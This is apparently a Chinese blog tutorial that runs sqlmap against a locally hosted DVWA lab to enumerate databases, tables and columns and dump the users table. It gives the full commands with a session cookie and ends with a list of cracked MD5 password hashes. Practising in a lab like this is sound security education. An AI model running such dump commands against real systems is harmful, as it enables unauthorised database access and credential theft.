slqmap的爆库爆表爆字段(以本地搭建的DVWA为例)
环境
window10、sqlmap、本地搭建的DVWA
步骤
1、先将DVWA安全等级设置为low
2、选择SQL Injection输入1查询
3、将url复制下来,并查看cookie信息
url:http://localhost:800/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
cookie="Cookie: security=low; PHPSESSID=7si7t5md1ntl03q0oc1ktcm0q2"
4、打开sqlmap使用命令爆库
命令
-u "http://localhost:800/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4utl40hqvahj8378t93m2uuep7" --dbs
然后在注入过程中会有一些交互,根据情况选择y/n,然后得到数据库:
5、爆表
命令:
-u "http://localhost:800/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4utl40hqvahj8378t93m2uuep7" -D dvwa --table
得到dvwa中的数据表如下:
6、爆users表结构并查询users表内有多少条数据
命令:
-u "http://localhost:800/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4utl40hqvahj8378t93m2uuep7" -D dvwa -T users --column
命令:
-u "http://localhost:800/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4utl40hqvahj8378t93m2uuep7" -D dvwa -T users --count
7、爆users表内容
命令:
-u "http://localhost:800/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4utl40hqvahj8378t93m2uuep7" -D dvwa -T users --dump
8、爆指定字段(user,password)
命令:
-u "http://localhost:800/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4utl40hqvahj8378t93m2uuep7" -D dvwa -T users -C user,password --dump
可以看到password是以密文存储的,在爆破过程中会询问是否要用字典进行解密,我选择的是n,下面我是手动解密的(数据少的时候可以考虑),最后得到如下结果:在线解密
user | Password | Password(解密后) |
---|---|---|
admin | 5f4dcc3b5aa765d61d8327deb882cf99 | password |
gordonb | e99a18c428cb38d5f260853678922e03 | abc123 |
1337 | 8d3533d75ae2c3966d7e0d4fcc69216b | charley |
pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 | letmein |
smithy | 5f4dcc3b5aa765d61d8327deb882cf99 | password |
slqmap的爆库爆表爆字段(以本地搭建的DVWA为例)相关推荐
- 获取sqlserver数据库中所有库、表、字段名的方法
获取sqlserver数据库中所有库.表.字段名的方法 2009年03月12日 星期四 下午 12:51 1.获取所有数据库名: SELECT Name FROM Master..SysDatabas ...
- 查表的所在的库/查字段所在的库,表,字段名称
//查表的所在的库 SELECT table_schema FROM information_schema.TABLES WHERE table_name = ''; //查字段所在的库,表,字段名称 ...
- Hive 基础(2):库、表、字段、交互式查询的基本操作
1.命令行操作 (1)打印查询头,需要显示设置: set hive.cli.print.header=true; (2)加"--",其后的都被认为是注释,但 CLI 不解析注释.带 ...
- linux中mysql的库、表和字段的字符集指令总结
一.查看数据库,表,字段编码 1.查看数据库编码 (1)通过show variables查看编码,需要转换数据库,不转换看的是server字符集.字符序. mysql> use test; my ...
- 让你轻松学会PHP版自动化SQL盲注工具-全库-全表-全字段-全字段值查询
前言 由于一些个人原因,很久没有研究WEB安全方面的一些问题了(废话四个月前月还发了帖),正好炎炎夏日暑假的生活到来,这个时候我需要的是恶补,恶补,恶补.兜兜转转到了SQL盲注部分,然后在SQL盲注上 ...
- [MYSQL / Mariadb]数据库学习-库、表管理
数据库基础的库.表管理 数据库基础 库管理 MySQL中加上system,可以执行Linux命令 一行写多个命令 表管理 建表 例: 查表架构 创建表记录 查表的创建命令和属性 加\G,可分行显示 修 ...
- 绕过waf mysql爆库_sqlilab-Less-21-30-writeup
Less-21 基于错误的Cookie头单引号字符型注入 跟Less-20是一样的,看了下源码确认是可以在cookie头进行SQL注入,但是Less-21做了一点修改,就是输入到源码中的代码需要经过b ...
- 如何利用SQL注入进行爆库
SQL注入能做什么 在<SQL注入基础>一文介绍了SQL注入的基本原理和实验方法,那接下来就要问一下,SQL注入到底能什么? 估计很多朋友会这样认为:利用SQL注入最多只能获取当前表中的所 ...
- 绕过waf mysql爆库_iwebsec刷题记录-SQL注入漏洞
被推荐了这个web平台,感觉挺适合新手的,网上搜了下没看到有人写wp,这里本入门萌新来稍微整理下自己解题的过程 SQL注入漏洞 01-数字型注入 http://localhost:32774/sqli ...
最新文章
- eclipse c语言_如果你的电脑是windows7/10的环境,用什么编译器学习C语言好?
- 修改mysql用utf8mb4_更改MySQL数据库的编码为utf8mb4
- 数据中台产品经理面试指南(二)
- mysql8.0 本地监听端口_mysql8.0启动后不能正常监听端口的问题处理
- eclipse没有日志_技术进展 | 加强公共DHT抵抗eclipse攻击!
- 计算机科学入门指南游戏攻略,【基础攻略】从零开始新手入门指南
- precede和previous_Previous Analyses of Hungarian Phrase Structure
- php后台如何避免用户直接进入方法
- 01_决策树案例一:鸢尾花数据分类
- 职场不接受Gap Year
- hyperv中的ubuntu虚拟机双网卡设置
- 常用的但是容易忘记的css样式..........持续更新,主要自用
- mac x99算法 java_黑苹果从入门到精通 篇九:从Clover转向OpenCore的X99 iMac Pro(一)...
- ios html调起高德地图,iOS 调用百度地图, 高德地图,苹果自带的地图
- python编写的动物识别专家系统_基于Python的动物识别专家系统
- 全铝合金家居零甲醛家具展示
- codemirror 只读模式(vue)
- php imap函数,Imap是什么意思,php imap 函数详解(2)
- win10更新右键没有卸载怎么解决?
- 《评人工智能如何走向新阶段》后记(再续17)
热门文章
- 小白的高德地图初体验(四)—— 矢量图形
- 一款适用于搭建内部培训平台的系统,开源了!
- 深度学习论文: MicroNet: Improving Image Recognition with Extremely Low FLOPs及其PyTorch实现
- 【JAVA】 抽象类和接口
- 浅谈onlyoffice文档协作在工程设计中的应用——共享excel计算书
- 请求转发(Forward)和重定向(Redirect)
- 小猪CMS中的header跳转
- 帝国cms html广告,帝国CMS网站默认JS广告防止被浏览器屏蔽的解决办法
- vue实现点击上下按钮或上下箭头,列表上下滚动功能及特效
- 深入IAT HOOK